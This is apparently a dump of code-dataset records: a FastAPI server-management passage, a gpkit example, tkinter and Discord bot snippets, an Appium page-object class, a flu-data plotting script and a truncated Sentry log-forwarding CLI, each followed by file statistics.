return {'result': 'failure', 'reason': f'Server {name} not online.'}
return {'result': 'success'}
@app.post('/servers/{name}/modify_prop')
async def start_server(name: str, res: Response, req: Request):
fields = await req.json()
if not 'content' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Content not passed.'}
if database.servers.find_one({'name': name}):
with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'w') as f:
f.write(fields['content'])
else:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.post('/servers/{name}/modify_spec')
async def start_server(name: str, res: Response, req: Request):
fields = await req.json()
if not 'content' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Content not passed.'}
if database.servers.find_one({'name': name}):
try:
database.servers.replace_one({'name': name}, json.loads(fields['content']))
return {'result': 'success'}
except:
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Bad content format.'}
else:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.get('/servers/{name}/')
async def get_server_info(name: str, res: Response):
spec = database.servers.find_one({'name': name})
if spec:
del spec['_id']
with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'r') as f:
props = f.read()
return {
'result': 'success',
'spec': spec,
'prop': props,
'running': name in manager.servers.keys()
}
else:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.get('/servers')
async def list_servers():
server_dict = {}
for s in database.servers.find():
if os.path.exists(os.path.join(CONFIG['server_folder'], s['name'])):
server_dict[s['name']] = {
'autostart': s['enabled'],
'running': s['name'] in manager.servers.keys(),
'address': s['address'],
'mem': s['max_memory']
}
return server_dict | 38.214058 | 142 | 0.621269 | 1,449 | 11,961 | 5.004831 | 0.198068 | 0.038058 | 0.041919 | 0.048263 | 0.338389 | 0.322532 | 0.295229 | 0.288748 | 0.273442 | 0.258825 | 0 | 0.009465 | 0.222724 | 11,961 | 313 | 143 | 38.214058 | 0.770571 | 0.006688 | 0 | 0.266904 | 0 | 0.003559 | 0.234804 | 0.018269 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003559 | false | 0.032028 | 0.078292 | 0 | 0.192171 | 0.010676 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
82371535c737935c03e91ede47e391e948acafe2 | 567 | py | Python | docs/source/examples/simple_sp.py | giserh/gpkit | 71b953fcac8f67f148b67b54b6e8cd4182dc0b3b | [
"MIT"
] | null | null | null | docs/source/examples/simple_sp.py | giserh/gpkit | 71b953fcac8f67f148b67b54b6e8cd4182dc0b3b | [
"MIT"
] | null | null | null | docs/source/examples/simple_sp.py | giserh/gpkit | 71b953fcac8f67f148b67b54b6e8cd4182dc0b3b | [
"MIT"
] | null | null | null | """Adapted from t_SP in tests/t_geometric_program.py"""
import gpkit
# Decision variables
x = gpkit.Variable('x')
y = gpkit.Variable('y')
# must enable signomials for subtraction
with gpkit.SignomialsEnabled():
constraints = [x >= 1-y, y <= 0.1]
# create and solve the SP
m = gpkit.Model(x, constraints)
print(m.localsolve(verbosity=0).summary())
assert abs(m.solution(x) - 0.9) < 1e-6
# full interim solutions are available
print("x values of each GP solve (note convergence)")
print(", ".join("%.5f" % sol["freevariables"][x] for sol in m.program.results))
| 28.35 | 79 | 0.705467 | 88 | 567 | 4.511364 | 0.659091 | 0.065491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018443 | 0.13933 | 567 | 19 | 80 | 29.842105 | 0.795082 | 0.29806 | 0 | 0 | 0 | 0 | 0.167095 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.3 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8237d91bd367fa37819ecabb2d7d852f0f4245f3 | 550 | py | Python | aula075.py | juniorpedroso/CFBCursos | 88657d6aad38de7d41e76499f0ff4d85a02745ae | [
"MIT"
] | null | null | null | aula075.py | juniorpedroso/CFBCursos | 88657d6aad38de7d41e76499f0ff4d85a02745ae | [
"MIT"
] | null | null | null | aula075.py | juniorpedroso/CFBCursos | 88657d6aad38de7d41e76499f0ff4d85a02745ae | [
"MIT"
] | null | null | null | # Aula 75 - SpinBox
from tkinter import *
app = Tk()
app.title('Pedroso')
app.geometry('500x300')
def exibirValor():
vvalor = sb_valores.get()
l_valor.config(text=vvalor)
# sb_valores = Spinbox(app, from_=0, to=10)
# Os valores podem ser informados por uma faixa, como acima,
# ou como abaixo, em uma tupla
sb_valores = Spinbox(app, values=(2, 4, 6, 8, 10))
sb_valores.pack()
l_valor = Label(app, text='Valor')
l_valor.pack()
btn_exibeValor = Button(app, text='Exibe Valor', command=exibirValor)
btn_exibeValor.pack()
app.mainloop()
| 19.642857 | 69 | 0.705455 | 85 | 550 | 4.447059 | 0.6 | 0.095238 | 0.079365 | 0.100529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036403 | 0.150909 | 550 | 27 | 70 | 20.37037 | 0.773019 | 0.267273 | 0 | 0 | 0 | 0 | 0.075377 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.071429 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
823a986d979638441ae38a1104614b823b72f2d7 | 3,922 | py | Python | src/data/dataset_utils.py | GuillaumeBarree/challenge-ENS | 50f1faa58be50a7c8cbd6078b4495679fd112c05 | [
"MIT"
] | null | null | null | src/data/dataset_utils.py | GuillaumeBarree/challenge-ENS | 50f1faa58be50a7c8cbd6078b4495679fd112c05 | [
"MIT"
] | null | null | null | src/data/dataset_utils.py | GuillaumeBarree/challenge-ENS | 50f1faa58be50a7c8cbd6078b4495679fd112c05 | [
"MIT"
] | null | null | null | """This file contains all functions related to the dataset."""
# pylint: disable=import-error
import os
import tqdm
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from torch.utils.data import Dataset
class RegressionDataset(Dataset):
"""Create a Torch Dataset for our regression problem."""
def __init__(self, x_data, y_data):
self.x_data = x_data
self.y_data = y_data
def __getitem__(self, index):
return self.x_data[index], self.y_data[index]
def __len__(self):
return len(self.y_data)
def basic_random_split(path_to_train, valid_ratio=0.2):
"""This function split file according to a ratio to create
training and validation.
Args:
path_to_train (str): path of the data root directory.
valid_ratio (float): ratio of data for validation dataset.
Returns:
dict: Dictionary containing every data to create a Dataset.
"""
# Load the different files
training_data = load_files(path_to_data=path_to_train)
# Prepare features and targets
features_and_targets = remove_useless_features(training_data=training_data)
features_and_targets = create_x_and_y(
input_data=features_and_targets, valid_ratio=valid_ratio
)
return features_and_targets
def load_test_data(path_to_test):
"""This function load test data
Args:
path_to_test (str): path of the data root directory.
Returns:
dict: Dictionary containing every data to create a Dataset.
"""
# Load the different files
test_data = load_files(path_to_data=path_to_test)
# Drop useless
test_data["input"] = test_data["input"].drop(columns=["_ID"])
# Create a target
test_data["target"] = np.ones((len(test_data["input"])))
feature_and_target = {
"x_test": test_data["input"].to_numpy(),
"y_test": np.ones((len(test_data["input"]))).ravel(),
}
return feature_and_target
def load_files(path_to_data):
"""Load data input files.
Args:
path_to_data (str): path of the data root directory.
Returns:
list(pandas.core.frame.DataFrame): List of Dataframe containing data from each file.
"""
data = {}
data_files = os.listdir(path_to_data)
for datafile in tqdm.tqdm(data_files):
if "input" in datafile:
data["input"] = pd.read_csv(
os.path.join(path_to_data, datafile), delimiter=",", decimal="."
)
else:
data["target"] = pd.read_csv(
os.path.join(path_to_data, datafile), delimiter=",", decimal="."
)
return data
def remove_useless_features(training_data):
"""Create features and targets
Args:
training_data (list): List of Dataframe containing data from each file.
Returns:
dict : Dictionary containing features and target for each file.
"""
data_dict = {}
for key, data in training_data.items():
features = data.drop(columns=["_ID"])
data_dict[key] = features
return data_dict
def create_x_and_y(input_data, valid_ratio): # pylint: disable=too-many-locals
"""Generate train, valid and test for each file and for each target.
Args:
input_data (dict): Features and targets for one file.
valid_ratio (float): Test and validation ratio.
Returns:
dict: train, valid and test inputs and targets.
"""
feature_and_target = {}
x_train, x_valid, y_train, y_valid = train_test_split(
input_data["input"], input_data["target"], test_size=valid_ratio, random_state=0
)
y_train = y_train.values.ravel()
y_valid = y_valid.values.ravel()
feature_and_target = {
"x_train": x_train.to_numpy(),
"y_train": y_train,
"x_valid": x_valid.to_numpy(),
"y_valid": y_valid,
}
return feature_and_target
| 26.863014 | 92 | 0.661652 | 539 | 3,922 | 4.54731 | 0.207792 | 0.031824 | 0.02856 | 0.014688 | 0.28927 | 0.25459 | 0.20155 | 0.189718 | 0.106079 | 0.106079 | 0 | 0.001006 | 0.239419 | 3,922 | 145 | 93 | 27.048276 | 0.82065 | 0.343447 | 0 | 0.095238 | 0 | 0 | 0.044702 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.126984 | false | 0 | 0.095238 | 0.031746 | 0.349206 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8240cdb3f22524daceb3ca1aaf3cf523bd2c0df4 | 12,619 | py | Python | poseidon/ui/mobile/android/base_page.py | peterkang2001/Poseidon | cfafc01a1f69210dbfd95a0c62e06269eb599034 | [
"Apache-2.0"
] | 2 | 2019-12-27T09:14:38.000Z | 2019-12-27T09:16:29.000Z | poseidon/ui/mobile/android/base_page.py | CodeMonkey4Fun/Poseidon | cfafc01a1f69210dbfd95a0c62e06269eb599034 | [
"Apache-2.0"
] | 2 | 2021-03-31T20:06:21.000Z | 2021-12-13T20:48:16.000Z | poseidon/ui/mobile/android/base_page.py | peterkang2001/Poseidon | cfafc01a1f69210dbfd95a0c62e06269eb599034 | [
"Apache-2.0"
] | 1 | 2020-11-13T07:37:01.000Z | 2020-11-13T07:37:01.000Z | # coding=utf-8
"""
@author:songmengyun
@file: base_page.py
@time: 2020/01/03
"""
import time
import logging
from selenium.webdriver.common.by import By
from appium.webdriver.common.touch_action import TouchAction
from selenium.webdriver.support.wait import WebDriverWait
from appium.webdriver.mobilecommand import MobileCommand
from appium.webdriver.connectiontype import ConnectionType
from poseidon.ui.util.location import *
from poseidon.base import CommonBase as cb
from poseidon.ui.mobile.android.android_keycode import KEYCODE
class Swipe:
'''滚动屏幕相关'''
def __init__(self, driver):
self.driver = driver
def swipe_up(self, width, height, n=5):
'''定义向上滑动方法'''
logging.info("定义向上滑动方法")
x1 = width * 0.5
y1 = height * 0.9
y2 = height * 0.25
time.sleep(3)
logging.info("滑动前")
for i in range(n):
logging.info("第%d次滑屏" % i)
time.sleep(3)
self.driver.swipe(x1, y1, x1, y2)
def swipe_down(self, width, height, n=5):
'''定义向下滑动方法'''
logging.info("定义向下滑动方法")
x1 = width * 0.5
y1 = height * 0.25
y2 = height * 0.9
time.sleep(3)
logging.info("滑动前")
for i in range(n):
logging.info("第%d次滑屏" % i)
time.sleep(3)
self.driver.swipe(x1, y1, x1, y2)
def swipe_left(self, width, height, n=5):
'''定义向左滑动方法'''
logging.info("定义向左滑动方法")
x1 = width * 0.8
x2 = width * 0.2
y1 = height * 0.5
time.sleep(3)
logging.info("滑动前")
for i in range(n):
logging.info("第%d次滑屏" % i)
time.sleep(3)
self.driver.swipe(x1, y1, x2, y1)
def swipe_right(self, width, height, n=5):
'''定义向右滑动方法'''
logging.info("定义向右滑动方法")
x1 = width * 0.2
x2 = width * 0.8
y1 = height * 0.5
time.sleep(3)
logging.info("滑动前")
for i in range(n):
logging.info("第%d次滑屏" % i)
time.sleep(3)
self.driver.swipe(x1, y1, x2, y1)
class Action:
'''操作手机通知栏/获取元素'''
def __init__(self, driver):
self.driver = driver
self.action = TouchAction(self.driver)
def get_element(self, locator):
"""
通过传入的locator获取selenium webelement对象
:param locator:
:return:
"""
locator_type = locator[0]
element = None
if locator_type == By.ID:
element = findId(self.driver, locator[1])
logging.debug("使用 id 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.XPATH:
element = findXpath(self.driver, locator[1])
logging.debug("使用 xpath 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.LINK_TEXT:
element = findLinkText(self.driver, locator[1])
logging.debug("使用 link text 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.PARTIAL_LINK_TEXT:
element = findPLinkText(self.driver, locator[1])
logging.debug("使用 partial link text 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.NAME:
element = findName(self.driver, locator[1])
logging.debug("使用 name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.TAG_NAME:
element = findTagName(self.driver, locator[1])
logging.debug("使用 tag name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.CLASS_NAME:
element = findClassName(self.driver, locator[1])
logging.debug("使用 class name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.CSS_SELECTOR:
element = findCss(self.driver, locator[1])
logging.debug("使用 css selector 定位元素 ==> {0}".format(locator[1]))
else:
logging.error("错误的locator_type,请确认")
return element
def get_elements(self, locator):
"""
通过传入的locator获取selenium webelements对象
:param locator:
:return:
"""
locator_type = locator[0]
elements = None
if locator_type == By.ID:
elements = findsId(self.driver, locator[1])
logging.debug("使用 id 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.XPATH:
elements = findsXpath(self.driver, locator[1])
logging.debug("使用 xpath 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.LINK_TEXT:
elements = findsLinkText(self.driver, locator[1])
logging.debug("使用 link text 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.PARTIAL_LINK_TEXT:
elements = findsPLinkText(self.driver, locator[1])
logging.debug("使用 partial link text 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.NAME:
elements = findsName(self.driver, locator[1])
logging.debug("使用 name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.TAG_NAME:
elements = findsTagName(self.driver, locator[1])
logging.debug("使用 tag name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.CLASS_NAME:
elements = findsClassName(self.driver, locator[1])
logging.debug("使用 class name 定位元素 ==> {0}".format(locator[1]))
elif locator_type == By.CSS_SELECTOR:
elements = findsCss(self.driver, locator[1])
logging.debug("使用 css selector 定位元素 ==> {0}".format(locator[1]))
else:
logging.error("错误的locator_type,请确认")
return elements
def set_touch_pwd(self, locator):
'''
设置手势解锁
:param locator: 获取第一个触摸点的坐标location及size
:return:
'''
start = self.get_element(locator)
start_height = start.size['height'] #
start_width = start.size['width']
start_x = start.location['x']
start_y = start.location['y']
begin_x = start_x + start_width / 2
begin_y = start_y + start_height / 2
action = TouchAction(self.driver)
action.press(x=start_x, y=start_y).wait(100).move_to(x=start_x + start_width * 2, y=begin_y).wait(100).\
move_to(x=start_x + start_width * 2, y=start_y + start_height * 2).wait(100).\
move_to(x=begin_x, y=start_y + start_height * 2).release().perform()
def adjust_volume(self, size):
'''调节系统音量,变大或变小'''
def adjust_brightness(self, size):
'''调节屏幕亮度,变大或变小'''
def clean_notification_bar_message(self):
'''清空通知栏消息'''
self.driver.open_notifications() # 打开下拉通知栏
def open_close_wifi(self):
'''打开/关闭Wi-Fi'''
def airplane_mode(self):
'''打开飞行模式'''
class KeyEvent:
'''按键事件'''
def __init__(self, driver):
self.driver = driver
def volume(self, size:int) -> None:
'''按键系统音量变大或变小'''
if size >=0:
for i in range(0, size):
self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_UP) # 音量大键
else:
for i in range(size, 0):
self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_DOWN) # 音量小键
self.driver.press_keycode(KEYCODE.KEYCODE_BACK) # 返回键
class AssertBase:
'''断言相关'''
def __init__(self, driver):
self.driver = driver
@cb.com_try_catch
def check_current_activity(self, app_activity):
'''验证当前activity是否登录传入app_activity'''
current_activity = self.driver.current_activity
if current_activity:
cb.checkEqual(current_activity, app_activity)
else:
logging.error('当前没有app_activity')
class BasePage(Swipe, Action, KeyEvent, AssertBase):
'''其他通过方法'''
def __init__(self, driver):
self.driver = driver
super().__init__(driver=self.driver)
@cb.com_try_catch
def install_app(self, app_path:str, app_package:str):
'''
:param app_path: 安装包路径
:param app_package: 安装包包名
:return: 先判断是否安装: 如果未安装,则执行安装
'''
if self.driver.is_app_installed(app_package):
logging.info(f'{app_package}已安装')
else:
self.driver.install_app(app_path)
logging.info(f'{app_package}安装成功')
@cb.com_try_catch
def uninstall_app(self, app_package:str):
'''
:param app_package: 安装包包名
:return: 先判断是否安装: 如果已安装,执行卸载
'''
if self.driver.is_app_installed(app_package):
self.driver.remove_app(app_package)
logging.info(f'{app_package}卸载成功')
else:
logging.info(f'{app_package}已卸载')
@cb.com_try_catch
def open_app(self, app_package:str, app_activity:str) -> None:
'''
:param app_package: 需要打开的应用名
:param app_activity: 需要打开的界面
:return: 在当前应用中打开一个activity或者启动一个新应用并打开一个 activity
'''
logging.info(f'当前activity: {self.driver.current_activity}')
self.driver.start_activity(app_package, app_activity)
logging.info(f'当前activity: {self.driver.current_activity}')
def app_strings(self):
'''返回应用程序的字符串'''
string = self.driver.app_strings(language='en')
return string
@cb.com_try_catch
def get_app_package_info(self):
"""
:return: 输出短信程序包名和界面名
"""
return [self.driver.current_package, self.driver.current_activity]
@cb.com_try_catch
def get_window_info(self):
'''获取屏幕宽度和高度'''
size = self.driver.get_window_size()
width = size['width']
height = size['height']
return [width, height]
def lock_app(self):
'''锁定屏幕'''
self.driver.lock(5)
def hide_keyboard(self):
'''收起键盘'''
self.driver.hide_keyboard()
def shake_app(self):
'''模拟设备摇晃'''
self.driver.shake()
def current_content(self):
'''进入指定上下文'''
current_content = self.driver.current_context # 列出当前上下文
current_contents = self.driver.contents # 列出所有的可用上下文
return current_content
@cb.com_try_catch
def backgroup_app(self, seconds:int, restart=True):
'''backgroup app seconds'''
if restart == True:
self.driver.background_app(seconds)
else:
pass
@cb.com_try_catch
def wait(self, fun, timeout=10, fre=1):
'''
:param : 显示等待
:return:
'''
wait = WebDriverWait(self.driver, timeout, fre)
wait.until(fun)
@cb.com_try_catch
def click_element(self, locator, is_button=True):
"""
点击
:param locator:
:param is_button:
:return:
"""
element = self.get_element(locator)
if is_button:
element.click()
else:
element = self.get_element(locator)
TouchAction(self.driver).tap(element).perform()
@cb.com_try_catch
def set_text(self, locator, values):
"""
为输入框 输入字符内容
:param locator:
:param values:
:return:
"""
text_field = self.get_element(locator)
text_field.clear()
text_field.send_keys(values)
def clean_app_cash(self,app_package):
'''清除app缓存'''
def is_displayed(self, locator, mark=True):
"""
判断某个元素是否存在
:param locator:
:return:
"""
element = self.get_element(locator)
if mark:
self.hight_light(element)
return element.is_displayed()
def hight_light(self, element, times=2, seconds=2, color="red", border=2):
"""
传入selenium webelement对象如果能找到就高亮显示
:param element:
:param times:
:param seconds:
:return:
"""
js = "element = arguments[0]; " \
"original_style = element.getAttribute('style'); " \
"element.setAttribute('style', original_style + \";" \
"border: %spx solid %s;\");" \
"setTimeout(function(){element.setAttribute('style', original_style);}, 1000);" %(border,color)
try:
for i in range(0, times):
self.driver.execute_script(js, element)
except Exception as e:
logging.error(e)
def switch_h5_app(self, context):
self.driver.execute(MobileCommand.SWITCH_TO_CONTEXT, {"name": context})
def find_item(self, el):
'''验证页面元素是否存在'''
logging.info(f'验证页面元素:{el} 是否存在')
source = self.driver.page_source
if el in source:
return True
else:
return False
| 29.902844 | 113 | 0.576908 | 1,479 | 12,619 | 4.770791 | 0.198107 | 0.085034 | 0.029478 | 0.040816 | 0.452664 | 0.3947 | 0.353033 | 0.293651 | 0.273243 | 0.257653 | 0 | 0.017684 | 0.296458 | 12,619 | 421 | 114 | 29.973872 | 0.777089 | 0.083842 | 0 | 0.393701 | 0 | 0 | 0.085046 | 0.015529 | 0 | 0 | 0 | 0 | 0.007874 | 1 | 0.149606 | false | 0.003937 | 0.03937 | 0 | 0.244094 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8243b500985cbd67fd910c97e1596597cb663eae | 958 | py | Python | cogs/testing.py | classerase/Stand-Arrow | 89183c266913af889dabb68f4d0c39153875f7da | [
"MIT"
] | 2 | 2020-06-03T20:48:09.000Z | 2020-06-04T04:29:06.000Z | cogs/testing.py | BrianDehlinger/Stand-Arrow | 150cb741c73a244a88ce1cbcb21c71753848bbc6 | [
"MIT"
] | 2 | 2020-06-15T18:28:17.000Z | 2020-06-17T20:44:43.000Z | cogs/testing.py | BrianDehlinger/Stand-Arrow | 150cb741c73a244a88ce1cbcb21c71753848bbc6 | [
"MIT"
] | 1 | 2020-06-03T20:48:07.000Z | 2020-06-03T20:48:07.000Z | from discord.ext import commands
class Testing(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def who(self, ctx):
author = ctx.author
await ctx.send(f"Hello {author}")
@commands.command()
async def debug_free_cash(self, ctx):
author = ctx.author
if str(ctx.author) != "TestUser#0001":
raise ValueError("Unauthorized API usage")
await ctx.send("You are not authorized to do that")
else:
await ctx.insert_into_inventory(author, "money", 1000)
await ctx.send("You have been given $1000!")
@commands.command()
async def debug_clear(self, ctx):
author = ctx.author
if str(ctx.author) != "TestUser#0001":
raise ValueError("Unauthorized API usage")
await ctx.send("You are not authorized to do that!")
else:
await ctx.clear_inventory(author)
| 30.903226 | 66 | 0.605428 | 120 | 958 | 4.75 | 0.416667 | 0.126316 | 0.084211 | 0.121053 | 0.607018 | 0.470175 | 0.470175 | 0.470175 | 0.470175 | 0.470175 | 0 | 0.023392 | 0.286013 | 958 | 30 | 67 | 31.933333 | 0.809942 | 0 | 0 | 0.48 | 0 | 0 | 0.189979 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.04 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8245cf950c7faf9f93224170dad96f903d0f0be0 | 2,603 | py | Python | scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py | eclee25/flu-SDI-exploratory-age | 2f5a4d97b84d2116e179e85fe334edf4556aa946 | [
"MIT"
] | 3 | 2018-03-29T23:02:43.000Z | 2020-08-10T12:01:50.000Z | scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py | eclee25/flu-SDI-exploratory-age | 2f5a4d97b84d2116e179e85fe334edf4556aa946 | [
"MIT"
] | null | null | null | scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py | eclee25/flu-SDI-exploratory-age | 2f5a4d97b84d2116e179e85fe334edf4556aa946 | [
"MIT"
] | null | null | null | #!/usr/bin/python
##############################################
###Python template
###Author: Elizabeth Lee
###Date: 1/25/15
###Function: time series difference in ILI percentage from CDC-based ILI baseline calculation
###Import data: SQL_export/OR_allweeks_outpatient.csv, anydiag_allweeks_outpatient.csv
###Command Line: python S_deltaILIpercent_time_CDCbaseline_v5.py
##############################################
### notes ###
# Baseline is mean percentage of patient ILI visits during non-flu weeks for the previous 3 seasons plus 2 standard deviations. A non-flu week is a period of 2+ consecutive weeks where flu was <2% of the total number of specimens lab-confirmed for flu. (cdc.gov/flu/weekly/overview.htm)
### packages/modules ###
import csv
import matplotlib.pyplot as plt
## local modules ##
import functions_v5 as fxn
### data structures ###
### functions ###
### data files ###
ILIin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/OR_allweeks_outpatient.csv','r')
ILIfile = csv.reader(ILIin, delimiter=',')
visitin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/anydiag_allweeks_outpatient.csv', 'r')
visitin.readline() # rm header
visitfile = csv.reader(visitin, delimiter=',')
### called/local plotting parameters ###
ps = fxn.pseasons
fw = fxn.gp_fluweeks
sl = fxn.gp_seasonlabels
colvec = fxn.gp_colors
wklab = fxn.gp_weeklabels
fs = 24
fssml = 16
### program ###
# dict_wk[wk] = seasonnum
# dict_ILIpercent[Thu date of week] = ILI as percent of total visits in that week (not a cumulative measure)
# dict_deltaILIpercent53ls[s] = [deltaILI percent wk 40, wk 41, ...wk 39
# dict_refWeek[s] = date of reference week for that season
d_wk, d_ILIpercent = fxn.week_ILIpercent_processing(ILIfile, visitfile)
code = 'cdc'
d_cdcILIpercent53ls = fxn.ILIpercent_processing_CDCbaseline(d_wk, d_ILIpercent)
# plot delta ILI percent time series
for s in ps:
plt.plot(xrange(53), d_cdcILIpercent53ls[s], marker = fxn.gp_marker, color = colvec[s-2], label = sl[s-2], linewidth = fxn.gp_linewidth)
plt.hlines([0], 0, 55, colors='k', linestyles='solid', linewidth=3)
plt.xlim([0, 52])
plt.xticks(range(53)[::5], wklab[::5])
plt.xlabel('Week Number', fontsize=fs)
plt.ylabel('delta ILI perc (ref %s)' % (code), fontsize=fs)
plt.legend(loc='upper right', prop={'size':10})
plt.savefig('/home/elee/Dropbox/Elizabeth_Bansal_Lab/Manuscripts/Age_Severity/fluseverity_figs_v5/exploratory/new_baseline_definition/deltaILIpercent_time_ref%s.png' %(code), transparent=False, bbox_inches='tight', pad_inches=0)
plt.close()
# plt.show()
| 40.046154 | 286 | 0.726854 | 379 | 2,603 | 4.852243 | 0.503958 | 0.016313 | 0.045677 | 0.039152 | 0.113105 | 0.113105 | 0.065253 | 0.065253 | 0.065253 | 0.065253 | 0 | 0.020241 | 0.107952 | 2,603 | 64 | 287 | 40.671875 | 0.771748 | 0.392624 | 0 | 0 | 0 | 0.035714 | 0.290254 | 0.242938 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.107143 | 0 | 0.107143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8246faf773d4f1bfd0da404df98ee155653febc9 | 4,328 | py | Python | sentrylogs/bin/sentrylogs.py | hossein/sentrylogs | 70eaf665f9010ba2d8370ccc4013673bab7e2b16 | [
"BSD-3-Clause"
] | 32 | 2015-07-01T11:12:32.000Z | 2021-09-04T23:58:27.000Z | sentrylogs/bin/sentrylogs.py | hossein/sentrylogs | 70eaf665f9010ba2d8370ccc4013673bab7e2b16 | [
"BSD-3-Clause"
] | 37 | 2016-05-27T13:55:24.000Z | 2022-02-24T14:55:58.000Z | sentrylogs/bin/sentrylogs.py | hossein/sentrylogs | 70eaf665f9010ba2d8370ccc4013673bab7e2b16 | [
"BSD-3-Clause"
] | 15 | 2015-10-14T14:20:23.000Z | 2021-12-03T08:49:15.000Z | #!/usr/bin/env python
"""Standalone script for Sentry Logs"""
from __future__ import print_function
import os
import argparse
try:
from configparser import ConfigParser
except ImportError: # Python 2.7
from ConfigParser import ConfigParser # pylint: disable=import-error
# Ignore warnings caused by ``sentrylogs.<...>`` imports
# pylint: disable=no-name-in-module
def get_command_line_args():
"""CLI command line arguments handling"""
parser = argparse.ArgumentParser(description='Send logs to Django Sentry.')
parser.add_argument('--sentryconfig', '-c', default=None,
help='A configuration file (.ini, .yaml) of some '
'Sentry integration to extract the Sentry DSN from')
parser.add_argument('--sentrydsn', '-s', default="",
help='The Sentry DSN string (overrides -c)')
parser.add_argument('--daemonize', '-d', default=False,
action='store_const', const=True,
help='Run this script in background')
parser.add_argument('--follow', '-f', default="all",
help='Which logs to follow, default ALL')
parser.add_argument('--nginxerrorpath', '-n', default=None,
help='Nginx error log path')
parser.add_argument('--loglevel', '-l', default=None,
help='Minimum log level to send to sentry')
return parser.parse_args()
def process_arguments(args):
"""Deal with arguments passed on the command line"""
if args.sentryconfig:
print('Parsing DSN from %s' % args.sentryconfig)
os.environ['SENTRY_DSN'] = parse_sentry_configuration(args.sentryconfig)
if args.sentrydsn:
print('Using the DSN %s' % args.sentrydsn)
os.environ['SENTRY_DSN'] = args.sentrydsn
if ('SENTRY_DSN' not in os.environ) or (not os.environ['SENTRY_DSN']):
raise SystemExit('No Sentry DSN found!')
if args.nginxerrorpath:
